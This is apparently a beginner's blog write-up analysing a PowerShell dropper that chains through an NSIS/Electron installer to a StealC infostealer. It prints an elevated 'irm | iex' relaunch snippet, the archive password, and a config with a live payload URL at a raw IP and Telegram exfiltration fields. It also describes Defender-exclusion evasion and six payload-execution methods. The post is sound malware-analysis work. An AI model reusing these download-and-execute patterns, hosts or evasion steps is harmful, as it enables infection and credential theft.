← ALL POSTS

Powershell Dropper - Analysis

04.07.2026 StealC Powershell Electron NSIS StealC Golang
sha256 7cd9942662433becf244379c67a71c53ec3588552e0d0acc7018559a4ddaac44

Overview

The sample is a file install.ps1.

Stage 1 - Powershell install script

It contains a link to the script itself, which it loads via irm and pipes to iex when the script is not executed as an Administrator. It does so to get the User to accept the UAC prompt.

if (-not ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)) {
    Start-Process powershell -Verb RunAs -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"irm $ScriptUrl | iex`""
    exit
}

The script then downloads the next stage. Its provided on github attached to an empty Repository as a Release.

repo-release

The Repository contains the Zip Archive containing Stage 2 and a standalone 7zip Executable 7za.exe.

I did not extensively check the authenticity of this file, but it seems genuine.

The script then uses the downloaded version of 7z to extract the password protected Zip Archive. The password used is H+h6)d.a.

The File extracted from the Archive is Release.exe - Stage 2.

Stage 2 - Release.exe

Release.exe: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive, 5 sections

Release.exe seems to be an installer. Unpacking it with 7z leads to an Electron App.

{
  "name": "installer",
  "version": "3.2.1",
  "description": "Runtime Components",
  "main": "main.js",
  "license": "MIT",
  "allowScripts": {
    "electron": true,
    "electron-builder": true,
    "javascript-obfuscator": true
  }
}

Now this main.js is finally something that we can work with.

Stage 3 - main.js

main.js contains some Configuration details that already lead me to suspect that this isn’t going to be the last stage.

const CONFIG = {
  TG_TOKEN: "",
  TG_CHAT_ID: "",
  PAYLOADS: [{"url":"http://62.60.226.198/uploads/ca089a46f61743cd83884b1577b489ef.exe","name":"payload.exe"}],
  FAKE_REPO: "Runtime Components",
  FAKE_BRANCH: "3.2.1",
  FAKE_FILES_COUNT: 1247,
  FAKE_SIZE_MB: "187.4 MB",
  BUILD_TAG: "",
  INSTALL_DIR: path.join(os.tmpdir(), "Setup", "cache", Date.now().toString()),
  AUTO_CLOSE_AFTER: 60000
};

This Config also already contains Information about the method of data exfiltration. The malware seems to communicate over telegram.

My sample didnt contain any telegram tokens which could have helped with further ivestigation.

The App implements a wide range of function. For example:

  • take screenshot
  • telegram API (send text/photos)
  • geolocation by ip
  • exclusion (wmi, registry, processes)
  • download to file
  • record seen IPs

The actual control flow is

app.whenReady().then(async function () {
  if (!isAdmin()) {
    await ensureAdmin();
    return;
  }
  await createHiddenWindow();
  await runSilentDropper();
});

ensureAdmin is again just a UAC promt. I suspect there was some plan to implement another form of privelege escalation, the Electron App also contains a file elevate.exe, which seems to remain unused.

createHiddenWindow does what the function name already explains and creates a Window far out of screen.

The malicious Execution starts at runSilentDropper. It starts out by calling prepareDefender which loops through all the provided payloads in the Config, in this case just one. And prepares exclusions for wmi, registry and processes, to hide the future payloads from Microsoft Defender.

After preparation, it runs startInstallation which downloads and executes the payloads, again just one in this sample.

I found interesting that executePayload implements 6 different ways to run the malicious Payload.

Methoddescription
method 1spawn detached
method 2cmd /c
method 3explorer.exe
method 4rundll32
method 5Powershell Start-process
Method 6VBS launcher (self deleting)

They are all ran with timeout in increaments of 2 seconds.

Because of the unbelievable amount of data exfiltration, almost every step was sending telegram api calls to keep the attacker in the loop, and the kind of structure of these Messages, i suspect its some kind of MaaS.

Stage 3 - payload.exe

The next and last stage of the attack is payload.exe.

payload.exe: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections

My plan was to analyze the executable in ghidra. Further analysis revealed the payload was written and compiled in go. The amount of bloat and boilerplate made static analysis really difficult, which is why i proceeded with some more research. I am sure there are good ways to dig into a go binary, but today i was happy with the progress i made. To my luck, i wasn’t the first person to find this exact binary.

MD5: 2a0c2ed95964cb00a0f7f7f8e01c573b

I found a dynamic analysis which seems to confirm my take on MaaS as it is flagged as StealC.

Conclusion

I am really happy how this analysis came together. I really didn’t expect that simple powershell script to turn into 3 unique stages of malware, but i am glad it did, because i am not sure i would have been confident enough do try it as my first analysis if i had known i advance. I will take from this that i have to do a little more studying about reverse engineering, especially languages like Go.

I reported the github repository, so let’s see what comes from that.

Thank you Lucas